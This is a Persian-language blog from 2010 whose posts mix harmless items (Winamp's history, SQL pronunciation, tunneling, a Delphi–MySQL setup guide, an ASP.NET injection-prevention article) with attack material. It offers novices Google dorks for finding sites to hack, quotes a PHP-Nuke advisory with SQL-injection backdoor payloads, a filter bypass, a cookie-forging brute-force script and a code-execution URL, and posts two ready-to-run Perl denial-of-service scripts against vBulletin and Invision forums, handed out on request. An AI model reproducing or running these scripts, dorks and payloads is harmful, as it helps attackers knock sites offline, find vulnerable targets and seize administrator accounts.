دلاری بخش اعظمی از بازار را در تصاحب خود دارند. حتی در وب نیز با وجود آنکه به نسبت به دنیای نرم افزارهای دسک تاپ و مبتنی بر کنسول(بازیهای کامپیوتری) بازاری جدیدتری است باز هم در طول چند ساخت اخیر امپراطوریهای نرم افزاری در حال شکل گرفتن هستند گوگل، مایکروسافت، یاهو، آمازون و ... غولهایی هستند که بخش عظیمی از ترافیک و گردش مالی در اینترنت را در اختیار خود دارند. امروز دیگر تصورش سخت است که یک یا دو برنامه نویس بتوانند یک جستجوگر با موقعیت فعلی گوگل خلق کنند و چه بسا نوشتن یک جستجوگر وب که تنها از لحاظ ارائه نتایج و نه جذب کاربران و کسب ترافیک قابل رقابت با جستجوگرهایی مانند گوگل باشد نیازمند هزینه چندین میلیون دلاری است.
روالی که قبلا در دنیای نرم افزار و البته میتوان گفت در بسیاری از صنایع دیگر نیز به وجود آمده است یعنی خریدن کوچکتر توسط بزرگترها خیلی زود به دنیای وب نیز راه پیدا کرد و بسیاری از ایده های خلاقانه که شاید میتوانستند زمانی با غولهای این عرصه رقابت کنند خیلی زود توسط یکی از غولهای نرم افزاری خریداری می شوند و همینطور که امروز نیز پیداست در آینده چند شرکت عظیم سهم اصلی را از ترافیک و درآمد در وب را خواهند داشت.
این روزها امید برنامه نویسان مستقل و تیمهای کوچک برنامه نویسی به بازار نرم افزارهای موبایلی است جایی که اگرچه همچنان جای عرض اندام بزرگترهاست اما جا برای ایده های خلاقانه و حتی میلیونر شدن باقیست. برای مثال نوشتن یک بازی برای موبایل (باتوجه به سطح سخت افزار موبایل و انتظار کاربران آن) در مقایسه با کنسولهای حرفه ای بازی برای یک تیم کوچک برنامه نویسی به مراتب آسان‌تر است.همچنین این بستر با توجه به ویژگیهای خود موضوعات جدیدی برای خلق نرم افزار مطرح می‌کند که توان پیاده سازی آن برای تیمهای کوچک برنامه نویسی وجود دارد و حداقل تا زمانی که این بازار از نرم افزارهای رایگان اشباح نشده باشد کاربران موبایل حاضر به پرداخت پول برای تهیه چنین نرم افزارهایی نیز هستند. با وجودیکه چند سالی از تولید و رواج آیفون نمی گذرد اما فروشگاه نرم افزار آیفون بستری شده که برنامه نویسان مستقل متعددی که توانسته اند ایده های خلاقانه و مشتری پسندی داشته باشند میلیونر شوند.
بی تردید برای چند سال آتی دنیای نرم افزارهای موبایلی محیط خوبی برای فعالیت برنامه نویسان مستقل و تیمهای کوچک نرم افزارهای خواهد بود.

با تشکر از علیرضا شیرازی(مدیریت محترم بلاگفا.کام)

با خالق Winamp آشنا شوید

نویسنده: سینا - چهارشنبه بیست و دوم اردیبهشت 1389

نرم افزار Winamp برای آنهایی که سابقه ای در کار با کامپیوتر دارند نامی آشناست. در واقع بسیاری از مردم دنیا اولین بار فایلهای موزیک با پسوند MP3 را با Winamp پخش کرده و شنیده اند. خالقین Winamp فرمت MP3 را ابداع نکردند اما این محصول نرم افزاری در ترویج و شناخته شدن این فرمت بخصوص در بین کاربران عادی کامپیوتر تاثیر بسزایی داشته است. فرمت MP3 یکی از مهمترین ابداعات نرم افزاری در عرصه موسیقی بوده و اگر نگاهی به بازار پخش کننده های موزیک مانند آی‌پد و همچنین فروش و پخش موزیک در اینترنت داشته باشیم متوجه عظمت MP3 خواهیم داشت. اگر امروز بسیاری از ما دهها آلبوم یا فایلهای موسیقی از خوانندگان و موزیکهای مورد علاقه‌مان در کامپیوتری شخصی دارم نتیجه ابتکاری به نام MP3 است. فرمت MP3 یک شیوه کدینگ و فشرده سازی صداست (MPEG-1 Audio Layer 3 ) و توسط گروه Moving Picture Experts Group و چند سال قبل از ارائه Winamp طراحی شده است اولین پخش کننده MP3 نیز نرم افزاری با نام WinPlay3 بود. اما با شروع عصر اینترنت و عرضه رایگان Winamp عملا این نرم افزار به یکی از محبوب ترین نرم افزارهای موسیقی تبدیل شد.
نرم افزار Winamp اولین بار در سال 1997 توسط جاستین فرانکل (Justin Frankel) عرضه شد. نسخه اولیه این نرم افزار از انجین نرم افزاری AMP برای پخش فایلهای mp3 استفاده می کرد که توسط Tomislav Uzelac برای مصارف غیر تجاری نوشته شده بود. عرضه رایگان Winamp در کنار خلاقیتهای جالبی که در رابط گرافیکی این نرم افزار به کار گرفته شده بود و همچنین حجم کم آن باعث موفقیت این محصول شد.جاستین فرانکل همچنین شرکتی به نام Nullsoft را نیز ثبت کرد که نام این شرکت نیز در نوع خود جالب است و کنایه ایی به اسم شرکت Microsoft است(null به معنای تهی یا هیج است) . شرکت Nullsoft مدتی بعد توسط شرکت AOL خریداری شد و البته جاستین فرانکل را نیز میلیونر کرد اما همانند بسیاری از ایده هایی که توسط شرکتهای بزرگ خریداری می شوند نرم افزار Winamp نتوانست موفقیت گذشته خود را تکرار کند و با پشتیبانی مدیا پلیر ویندوز از MP3 و ورود دهها نرم افزار پخش کننده MP3 دوران درخشش Winamp نیز به پایان رسید هرچند که هنوز هم یکی از محصولات خوب در در نوع خود است.

جاستین فرانکل خالق Winamp یکی از خوره های کامپیوتر به معنای واقعی کلمه است که از نوجوانی اهل برنامه نویسی بوده و مانند بسیاری از افراد موفق حوزه نرم افزار نیز دانشگاه خود را به پایان نرسانده است! او مدتی پس از ارائه رایگان Winamp تنها از طریق کمکهای مالی اختیاری مشتریان ماهیانه هزاران دلار درآمد کسب می کرد. فروش شرکت Nullsoft به AOL و البته میلیونر شدن جاستین تغییری در او نداده و جاستین بعد از Winamp بصورت مستقل چندین نرم افزار قدرتمند دیگر نیز عرضه کرد که NINJAM و REAPER از معروفترین آنهاست .همچنین او شبکه Gnutella که یک شب peer-to-peer برای به اشتراک گذاری فایلها را نیز بنیان نهاده است.خصلت مهم Gnutella این بود که بر خلاف شبکه Napster یک شبکه متمرکز نبود و مانند شبکه های متمرکز متوقف کردن فعالیت آن با خاموش کردن یک یا چند سرور ممکن نیست. جاستین شرکتی به نام Cockos نیز تاسیس کرده است که در زمینه طراحی و ارائه محصولات نرم افزاری در زمینه موسیقی فعالیت می کند. ایده سایت turnofftheinternet.com نیز از جاستین است.

جاستین همچنین وبلاگی نیز دارد که نوشته هایش در این وبلاگ نشان ار تفکرات او دارد او پس از سالها همچنان همانند یک برنامه نویس تازه کار و با اشتیاق است و پستهای زیادی در وبلاگ او درباره جزئیات فنی و بسیار ریز برنامه نویسی است. جاستین فرانکل نمونه کامل یک برنامه نویس و مبتکر نرم افزار است که تلاش هایش در دنیای نرم افزار و اینترنت و حتی سبک زندگی مردم موثر بوده است.

منبع: وبلاگ آقای شیرازی (مدیریت بلاگفا.کام)

تلفظ SQL

نویسنده: سینا - چهارشنبه بیست و دوم اردیبهشت 1389

برنامه نویسان و کارشناسان کامپیوتر دو گروه هستند آنهایی که واژه SQL را « اس کیو ال » تلفظ میکنند و گروهی که آنرا « سکوئل » تلفظ میکنند! اما حق با کدام است؟ و براستی تلفظ SQL چیست؟ خب همانطور که اشاره شد هر گروه از برنامه نویسان نظر خاص خود را دارند و معتقدند تلفظ ایشان درست است. صرف کمی وقت و جستجو در اینترنت شاید بتواند ما را به پاسخ صحیح برساند اما گویی در آنسوی آبها نیز بین برنامه نویسان نرم افزارهای بانک اطلاعاتی هم اختلاف نظر وجود دارد اما در هر حال این جستجو بی فایده نیست. در واقع تلفظ اولیه SQL همان سکوئل (SEQUEL) بوده است و طراحان اولیه این زبان در IBM برای مدتی از همین تلفظ استفاده می کردند اما بعدها به دلیل مشکل کپی رایت (یا شاید مشکل دیگری) تلفظ SQL تغییر کرد و در واقع در شرکت مبتکر SQL سالهاست که دیگر از تلفظ اس کیو ال استفاده می شود. در ویکی پدیا نیز در صفحه تعریف SQL اشاره به همین تلفظ شده است. اما همچنان در مستندات برخی شرکتها بخصوص Oracle و Sql Server به تلفظ سکوئل اشاره شده است. نکته جالب آنکه در تلفظ محصولات نرم افزاری که این واژه در نام آنها وجود دارد این اختلاف وجود دارد سایت MySQL به شکل صریح در مستندات و صفحات سایت خود اشاره کرده است که تلفظ MySQL به شکل مای اس کیو ال است اما در بسیاری از فیلمها و سمینارهای مایکروسافت سخنرانان از تلفظ سکوئل سرور برای محصول Sql Server این شرکت استفاده میکنند.
براساس آنچه اشاره شد تلفظ درست برای واژه SQL (به عنوان زبان و فن آوری) اس کیو ال است که این تلفظ مورد تایید انستیتوی ملی استاندارد آمریکا ANSI است ولی در مورد محصولاتی مانند Sql Server از سکوئل سرور (نامی که با آن شناخته شده اند) استفاده کنید هرچند که جدیدا برخی از برنامه نویسان مایکروسافت نیز از تلفظ اس کیو ال سرور استفاده می کنند.

منبع : وبلاگ علیرضا شیرازی (مدیریت بلاگفا.کام)

دورک های | Sql Injection Dorks

نویسنده: سینا - شنبه هجدهم اردیبهشت 1389

دوستان تازه کار که تازه روش معروف Sql Inection رو یاد گرفتن احتیاج به تارگت برای هک کردن دارن ! با استفاده از این دستورات میتونید از گوگل سایت های خوبی برای هک استفاده کنید !

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()

inurl:”id=” & intext:”Warning: mysql_fetch_array()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: is_writable()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: Unknown()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: pg_exec()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: mysql_query()

inurl:”id=” & intext:”Warning: array_merge()

inurl:”id=” & intext:”Warning: preg_match()

inurl:”id=” & intext:”Warning: ilesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: require()

مروری بر Php-Nuke و همه باگ های آن !

نویسنده: سینا - پنجشنبه شانزدهم اردیبهشت 1389

Vulnerabilities in PHP-Nuke

The latest version of PHP-Nuke is very insecure. Exploit code has been written which chain together a number of the following vulnerabilities to obtain wormable remote code execution. My recommendation is to avoid using PHP-Nuke, this is a very insecure project and there are many more vulnerabilities to be found.

Exploit code

The exploit code above also bypasses Ubuntu 10.04's AppArmor rule-sets. First I use Sql Injection to create a file /tmp/theme.php using MySQL's "into outfile". I then use a Local File Include Vulnerability to execute this file. Traditionally exploits try to use a union select "" into outfile "/var/www/backdoor.php", however mysql cannot write to /var/www due to AppArmor. This is an attack pattern that defeats AppArmor and I believe that this is a vulnerability in AppArmor that needs to be patched. It should be noted that SELinux does prevent remote code execution, although obtaining administrative access is still possible.

Type: SQL Injection (CWE-89)

Version affected: 8.0 to 8.1.35 (may 2010)

Status:unpatched

input variable: mood

Works with maigic_quotes_gpc=On or Off

The Journal module is enabled by default to all registered users.

A vulnerablity in this module can be used to obtain administrative credentials from the database.

File: ./modules/Journal/savenew.php on line 81:

if (isset($mood)) { $mood = filter($mood, "nohtml"); }

The call to filter() will remove backslashes if magic_quotes_gpc is enabled.

The vulnerable query query on line 85:

"INSERT INTO ".$prefix."_journal (jid,aid,title,bodytext,mood,pdate,ptime,status,mtime,mdate) VALUES (NULL,'$username','$title','$jbodytext','$mood','$pdate','$ptime','$status','$mtime','$ndate')";

This can be used to obtain the username and md5 password hash of an administrative user.

--------------------------------------------------------------------------------

Type: SQL Injection (CWE-89)

Version affected: 8.0 to 8.1.35(may 2010)

Status:unpatched

input variable: chng_user

Works with maigic_quotes_gpc=On or Off

File: ./modules/Your_Account/admin/index.php

lines 108 and 109:

$chng_user = stripslashes(check_html($chng_user, "nohtml"));

$result = $db->sql_query("SELECT user_id, username, name, user_website, user_email, femail, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_interests, user_viewemail, user_avatar, user_sig, user_password, newsletter from " . $user_prefix . "_users where username='$chng_user'");

chng_user is vulnerable to sql injection regardless of magic_quotes_gpc.

You must be an administrator in order to access this vulnerablity.

It is valuable to the attacker becuase you can upload files:

' or 0=1 UNION SELECT "" into_outifle("/var/www/backdoor.php")

create a file on remote server. An insert statement cannot use into_outifle().

--------------------------------------------------------------------------------

Type: SQL Injection filter bypass (CWE-436)

Version affected: 7.0 to 8.1.35 (may 2010)

Status:unpatched

This Poc request will bypass the filter check in mianfile.php on line 414:

UNION/**/ SELECT "text" into_outifle("/tmp/test.txt")

These are the vulneralbe comparisons in./mainfile.php on line 414:

if ((stristr($postString,'%20union%20')) OR (stristr($postString,'*/union/*')) OR (stristr($postString,' union ')) OR (stristr($postString_64,'%20union%20')) OR (stristr($postString_64,'*/union/*')) OR (stristr($postString_64,' union ')) OR (stristr($postString_64,'+union+')){

header("Location: index.php");

die();

}

--------------------------------------------------------------------------------

Type: OWASP 7: "Broken Authentication and Session Management" (CWE-784 and CWE-384)

Version affected: 7.0 to 8.1.35(may 2010)

Status:unpatched

The Session ID is immortal because it is made up of

the username (aid) and md5 password hash (pwd) .

Using the sql injeciton vulnerablity above it is

possilbe to obtian both the aid and pwd of an administrator.

The aid and pwd can then be used to gain

immediate access without the need to crack the md5 hash.

./mainfile.php line 326:

function is_admin($admin) {

static $adminSave;

if (!$admin) { return 0; }

if (isset($adminSave)) return $adminSave;

if (!is_array($admin)) {

$admin = base64_decode($admin);

$admin = addslashes($admin);

$admin = explode(':', $admin);

}

$aid = $admin[0];

$pwd = $admin[1];

$aid = substr(addslashes($aid), 0, 25);

if (!empty($aid) && !empty($pwd)) {

global $prefix, $db;

$sql = "SELECT pwd FROM ".$prefix."_authors WHERE aid='$aid'";

$result = $db->sql_query($sql);

$pass = $db->sql_fetchrow($result);

$db->sql_freeresult($result);

if ($pass[0] == $pwd && !empty($pass[0])) {

return $adminSave = 1;

}

return $adminSave = 0;

}

To exploit the vulnerablity follow these steps.

1)Get the aid and pwd using sql injeciton.

2)Navigate to http://127.0.0.1/admin.php

3)Use the PHP PoC code below, and paste the output in the address bar.

4) Vist http://127.0.0.1/admin.php again and you will be logged in as the administrator.

This javascript can be used to generate a cookie from stolen credentals.

--------------------------------------------------------------------------------

Type: Captcha Bypass (CWE-264)

Version affected: 7.0 to 8.1.35(may 2010)

Status:unpatched

PHP-Nuke can be configured to require a visual captcha to be solved

in order to login as a user or administrator.

This is an optional security feature to prevent brute force.

This requirement for a captcha can be bypassed by

presenting the web server with a forged cookie,

instead of attempting a login with a

username/password as a post request.

The Captcha is also used for user signups,

which this attack does not affect.

PoC Login Brute Force Exploit:

$http=new http();

$x=0;

foreach $wordlist as $pass{

$http->cookie="admin=".base64_encode($admin_name.":".md5($pass).":").";";

$resp=$http->send("http://127.0.0.1/admin.php");

if(!strstr($resp,"Administration System Login")){

break;

}

//This stays below ipban.php's rate limit of less than 5 requests per 2 seconds.

if(!($x%4)){

sleep(2);

}

$x++;

}

if(!strstr($resp,"Administration System Login"))){

print "password:$pass\n";

}else{

print "password not found\n"

}

--------------------------------------------------------------------------------

Type: OWASP 6 "Information Leakage and Improper Error Handling" and Least Privilege Violation (CWE-388 and CWE-200 and CWE-272)

Version affected: 7.0 to 8.1.35(may 2010)

Status:unpatched

Configuration change leading to information leakage:

/admin.php

If you are an administrator then you can post: xdisplay_errors=1.

This turn on error reporting for the entire site, even if it is disabled in phpl.ini.

This is Least Privilege Violation (CWE-272) becuase the php-nuke admin account should not

need to override php.ini settings. Using this attack to find the local path of the

remote web server makes my remote code execution exploit more sucessful.

Path disclosure:

When error_reporting is enabled then it is possilbe to obtain the full local path to the web root:

./admin/modules/authors.php line 289

When chng_pwd is an array such as this:

chng_pwd[]=1

A call to md5() will throw a warning.

--------------------------------------------------------------------------------

Type: Local File Include (LFI) (CWE-98)

Version affected: 8.0 to 8.1.35(may 2010)

Status:unpatched

The administrator can change the default theme to any directory:

In ./admin/modules/settings.php in savethemes() on Line 684:

$db->sql_query("UPDATE ".$prefix."_config SET Default_Theme='$xDefault_Theme', overwrite_theme='$xoverwrite_theme'");

Then a local file include vulnerablity will be triggered by sending this get request:

http://127.0.0.1/index.php

The LFI is in ./mainfile.php on line 1039:

include_once("themes/$ThemeSel/theme.php");

--------------------------------------------------------------------------------

Type: remote php code execution using preg_repace():

Version affected: 7.x

Status: Patched

PHP-Nuke 7.x is using an old version of PHPBB that is vulnerable to CVE-2004-1315 .

PHPBB is disabled by default, however the administrator can enable it.

The orginal PoC Exploit described by this CVE is as follows:

http://127.0.0.1/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf(20041315).%2527

A modification is made to urlencode the parenthesis () in order to bypass a filter in PHP-Nuke's mianfile.php .

http://127.0.0.1/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%25277

--------------------------------------------------------------------------------

خروج از دسترسی ؟ ویبولتین !

نویسنده: سینا - چهارشنبه هشتم اردیبهشت 1389

دوستان درخواست کدی برای خارج کردن ویبولتین از دسترس کرده بودن . این هم از کد ! حاضر و آماده !

# VBulletin 0-day denial of service II

#Perl Script

use Socket;

if (@ARGV < 2) { &usage; }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http://)//eg;

for ($i=0; $i<10; $i++)

{

$user="vbulletin".$rand.$i;

$data = "s=&";

;

$len = length $data;

$foo = "POST ".$dir."index.php HTTP/1.1\r\n".

"Accept: * /*\r\n".

"Accept-Language: en-gb\r\n".

"Content-Type: application/x-www-form-urlencoded\r\n".

"Accept-Encoding: gzip, deflate\r\n".

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

"Host: $host\r\n".

"Content-Length: $len\r\n".

"Connection: Keep-Alive\r\n".

"Cache-Control: no-cache\r\n\r\n".

"$data";

my $port = "80";

my $proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,"$foo", 0);

syswrite STDOUT, "Fire";

}

print "nn";

system('ping $host');

sub usage {

print "tusage: n";

print "t$0 n";

print "tex: $0 127.0.0.1 /forum/n";

print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn";

exit();

};

موفق باشید !

اکسپلویت خارج کردن از دسترسی (فروم های اینویژن)

نویسنده: سینا - چهارشنبه هشتم اردیبهشت 1389

نام اکسپلویت : Invision power board 0-day denial of service

اکسپلویت کد :

# Invision power board 0-day denial of service 2 100% works..
#
# It works on all versions! can DOS the whole server!
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="seeme".$rand.$i;
$data = "adsess=&";
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
#########################################
# Greetz to Inj3ct0r Crew

استفاده از اکسپلویت هم مانند هر کد مخرب دیگری می باشد ! امیدوارم به دردتون بخوره !

اشنایی با tunneling

نویسنده: سینا - چهارشنبه یکم اردیبهشت 1389

اتصال دو شبکه ی مختلف در حالت کلب بسیار سخت است ولیکن یک حالت خاص و رایج وجود دارد که هم برای ما رهگشا می باشد و هم کاملا قابل مدیریت است.میریم که باهاش اشنا شیم:
این حالت زمانی اتفاق می افتد که ماشین های مبدا و مقصد بر روی شبکه هایی از یک نوع هستند ولی یک سبکه ی متفاوت بین ان ها قرار گرفته است.
خب بیاین با مثال موضوع رو بررسی کنیم:
یک بانک بین المللی رو در نظر بگیرید که یک شبکه ی اترنت مبتنی بر پروتکل tcp/ip در پاریس و همچنین یک اترنت با پروتکل tcp/ip در لندن واقع است ولی به نحوی یک شبکه به غیر از ip مثل ATM در میان ان ها قرار گرفته است
راهکار حل این مشکل تکنیکی به نام ایجاد تونل یا tunneling است.برای ارسال یک بسته ی ip به ماشین 2،ماشین 1،بسته ای حاوی ادرس ip ماشین 2 ساخته و ان را درون فریم شبکه ی اترنت خود قرار داده و ادرس router چند پروتکلی واقع در پاریس را در فیلد ادرس این فریم درج کرده و ان را بر روی اترنت قرار می دهد.هرگاه این router چند پروتکلی این فریم را دریافت کند بسته ی ip را از درون فریم دریافت کرده و ان را در فیلد حمل داده یا payload از بسته لایه شبکه ی WAN قرار داده و ادرس بسته ی جدید را ادرس router چند پروتکلی واقع در لندن قرار می دهد.هرگاه این بسته به مسیریاب واقع در لندن برشد ان مسیریاب بسته ip اصلی را از درون ان برداشته و ان را با قرار دادن در یک فریم اترنت برای ماشین 2 می فرستد.
شبکه ی WAN را می تواند تونل بزرگ در نظر گرفت که از یک مسیریاب چند پروتکلی شروع به مسیریابی دیگر از همین نوع،در طرف دیگر WAN ختم می شود.یک بسته ی ip درحالی که درون یک بسته ی دیگر جا گرفته است از یک طرف تونل شروع به طی مسیر به طرف دیگر تونل می کند و جای هیچ گونه نگرانی در خصوص ساختار WAN وجود ندارد.زیرا تنها کاری کهWAN انجام می دهد انست که مبتنی بر پروتکل فعلی خود بسته ی ip را به عنوان یک قطعه ی خام در یک نقطه دریافت در نقطه ی دیگر تحویل می دهد.

موفق و پیروز باشید
سینا/

How To Connect To MYSQL Via Delphi

نویسنده: سینا - چهارشنبه یکم اردیبهشت 1389

فایل بالا را دانلود و نصب کنید. البته کاربران گرامی توجه داشته باشند که دانلود از این سایت برای کاربران ایرانی ممنوع می باشد و مجبور خواهید بود از وی پی ان و یا فیلتر شکن استفاده کنید

(گام دوم) : Second Step

Follow The Instruction. Go To “Control Panel->Administrative Tools-> Data Sources (ODBC)” in Windows XP. Press Add Button, Then Choose “MYSQL ODBC 5.1 Driver” And Press “Finish” . (Fig 1)

مسیر اشاره شده در بالا را در کنترل پنل ویندوز خود دنبال کنید. در پنجره باز شده دکمه add را کلیک کنید و از لیست باز شده گزینه MYSQL ODBC 5.1 را انتخاب کنید و Finish را کلیک کنید. (شکل 2)

In “MYSQL Connector” Window Fill Following Boxes As Mentioned Below (Fig 2) :

در پنجره باز شده گزینه های مشخص شده در زیر را با توجه به توضیحات ارائه شده پر کنید :

Data Source Name : (The Driver Name That You Connect Through With MYSQL Via Delphi, Try ‘MYSQL Connector’)
Server : (In Mist Cases ‘Localhost’ or ‘127.0.0.1′)
User : (Usually ‘root’)Password : (usually Blank – No Password)
Database : (Your Database Name,For Instance try ‘test’ )

Now Click Test. If Successfull, You See The Exact Message Right Away. It’s Done. Now We are going to Delphi For Setting ConnectionString.

پس از پر کردن فیلد های مشخص شده بر روی دکمه تست کلیک کنید. اگر تنظیمات صحیح اعمال شده باشند پیغام موفقیت آمیز بودن عملیات را دریافت م یکنید. حال پنجره را بسته و وارد محیط دلفی شوید

Third Step (گام سوم) :
Delphi Enviroment
1. Put An “ADO Connection” From “ADO” Tab
2. Click “ConnectionString” Property
3. From The Property Window Click On “Build” Button
4. Choose “Microsoft OLE DB Provider for ODBC Drivers “. Click “Next”
5. Select “Data Source Name” The name you created in Step 2
6. Fill UserName And Password And Initial catalog (Database name) As You Desire
7. test Connection To See Nothing is Wrong

اتصال شی ADO Connection به بانک MYSQL
1. ابتدا یک شی ADO Connection از تب ADO بر روی فرم قرار دهید
2. بر روی آن دوبار کلیک کنید تا خاصیت ConnectionString آن در پنجره با همین نام باز شود.
3. دکمه Build را کلیک کنید.
4. از پنجره باز شده از درایور های موجود ، گزینه Microsoft OLE DB Provider for ODBC Drivers را انتخاب کنیدو دکمه Next را بزنید
5. در پنجره باز شده در قسمت Data Source Name نامی را که در مرحله 2 ایجاد کردید انتخاب کنید
6. قسمت های مربوط به Username ، Password و Initial catalog که همان نام دیتابیسی است که به آن پیوند می دهید را انتخاب کنید.
7. برای اطلاعذاز صحت اتصال به بانک م یتوانمید بر روی دکمه test کلیک کنید.

Now You Can Use AdoQuerry Or Other Components To Execute Your Queries. Ask Your Question Only Via Comments.

شما اکنون به دیتابیس خود درMYSQL متصل شده اید . میتوانید با استفاده از دیگر ابزار در دلفی همانند ADO Querry دستورات خود را اجرا کنید.همچنین می توانید سوالات خود را در قالب نظر (Comment) مطرح کنید.

جلوگیری از حملات SQL Injection در ASP.NET

نویسنده: سینا - سه شنبه سی و یکم فروردین 1389

در این مقاله فرض شده است که خواننده با اصول اولیه زبان پرس و جوی ساخت یافته (Structured Query Language) یا همان SQL آشنا است. در ضمن کدهای موجود در این مقاله تماما به زبان VB.NET می باشند

یک حمله SQL Injection چیست؟

حتما در فیلمهای سینمایی دیده اید که بسیاری از تبهکاران قربانیان خود را با تزریق مواد سمی به جای دارو از میان بر می دارند. آیا در دنیای سایبر نیز چنین ایده هایی وجود دارد؟ در کمال تعجب باید بگویم که بله!! هکرها هم به نوعی از این شگرد استفاده می کنند. می گویید چگونه؟ با تزریق کردن دستورات SQL مورد علاقه خود به Application شما! اجازه دهید تا با یک مثال مطلب را روشن تر کنم:

سیستم Login:

صفحات Login معمولا دارای فیلدهایی هستند که دو مقدار ID و Password را از کاربر گرفته و سپس با استفاده از یک دستور SQL آن را پردازش می کنند. نمونه ساده ای از این دستور به صورت زیر است:

SELECT COUNT(UserID) FROM tblUsers WHERE UserID=’” & UserID.Text & “‘ AND Pass=’” & Password.Text & “‘”

در این مثال UserID و Password دو کنترل TextBox هستند که مقادیر آنها بایستی مورد پردازش قرار گیرد. حال فرض می کنیم کاربر مقادیر را به صورت mahdi و ۱۲۳ وارد نماید، در این صورت جمله SQL به صورت زیر تولید می شود:

SELECT COUNT(UserID) FROM tblUsers WHERE UserID=’mahdi’ AND Pass=’123′
خوب تا اینحا مشکلی وجود ندارد. حال فرض کنید که هکر ما به جای کلمه کاربری خود عبارت زیر را وارد نماید:

‘ OR 1=1 –

در این صورت عبارت SQL زیر تولید خواهد شد:

SELECT COUNT(UserID) FROM tblUsers WHERE UserID=” OR 1=1 – AND PASS=”
احتمالا می دانید که کاراکتر - در SQL علامت توضیحات است و عبارت پس از آن دیگر پردازش نمی شود لذا هنگام پردازش دستور چون همواره ۱=۱ است و با توجه به OR به کار رفته، بدون توجه به خالی بودن مقدار مقابل UserID 1=1 کافی تلقی شده و کلیه رکوردهای بانک اطلاعاتی برگردانده می شود و Attacker اصطلاحا Authenticate می شود.

پیش از آنکه به ارائه راه حل این حفره امنیتی خودساخته بپردازیم این نکه شایان ذکر است که این حملات در پایگاه اطلاعاتی SQL Server بسیار پیچیده تر است که در قسمت دوم مقاله مورد بررسی قرار خواهد گرفت.

چاره کار!

ساختار شی گرای ASP.NET و امکانات این ساختار به برنامه نویسان امکان مانور بیشتری را داده است. حال ما کد کامل اصلاح شده را در زیر آورده و سپس توضیحات آن را ذکر می کنیم:

Dim strSQL As String = "SELECT COUNT(UserID) FROM tblUsers WHERE

UserID=@UserID AND Password=@Password"

Dim cmndCheck As OleDbCommand = New OleDbCommand(strSQL, _Connection)

cmndCheck.Parameters.Add("@UserID", UserID.Text);

cmndCheck.Parameters.Add("@Password", Password.Text);

cmndCheck.Connection.Open()

Dim IsValid As Integer = cmndCheck.ExecuteScalar()

If IsValid > 0

'... Some Code here... User is authenticated

Else

'... Some Code here... User is not aututorized to view the page

End If

تغییر در همان خط اول یعنی دستور SQL مشخص است این بار به جای اینکه مقادیر دریافتی از فیلدها با Single Quote به خورد پردازشگر دستور داده شود مقادیر با پارامترهای تولید شده توسط آبجکت OleDbCommand جایگزین می شود و در آخر cmndCheck پردازش شده چنانچه مقدار تولید شده توسط ExecuteScalar بزرگتر از صفر باشد بدین معنی است که حداقل یک رکورد با شرایط مورد نظر ما پیدا شده است.
(متغیر Connection_ که باید برابر ConnectionString شما قرار گیرد دانسته فرض شده است)

تقاوت اصلی این روش نسبت به روش ناامن قبلی این است که در اینجا مقادیر به صورت کاملا” پارامتری شده پردازش می شوند نه به صورت قطعاتی از یک رشته حرفی که در واقع دام اصلی SQL Injection به شمار می آید. در واقع ما در اینجا از تکنیکهای رشته سازی با استفاده از & یا + اجتناب کرده ایم.

نکته مهم دیگری که باید حتما مورد توجه قرار دهید این است که یکی از راههایی که هکرها برای حمله به سایت شما استفاده می کنند خطاسازی صوری در زمان اجرای Application و مطالعه اطلاعات خطای دریافت شده است. برای جلوگیری از این اتفاق که می تواند ساختار بعضی از قسمتهای کد شما را برای حمله کنندگان آشکار کند حتما در Application خود از روال خطایابی Customize شده استفاده کنید.

علاوه بر این می توانید در بسیاری از قسمتها به صورت موردی از Try…End Try استفاده کنید و برای اطلاع خودتان از خطای رخ داده e As OleDbException را به آدرس Email خود ارسال کنید که در این مورد در فرصتی دیگر صحبت خواهم کرد.

این مثال و راه حل یکی از ساده ترین انواع حملات Injection روی Web Applicationهاست و شما می توانید نمونه ها و مثالهای متعددی در این خصوص را در سایتهای www.sqlsecurity.com و www.nextgenss.com پیدا کنید که چنانچه گفته شد (و در قسمت دوم این مقاله بدان پرداخته خواهد شد) بیشتر مربوط به SQL Server است.

روش کلی کار در SQL Server نیز کمابیش مشابه همین روش است با این تفاوت که در آنجا از Stored Procedure استفاده می شود.

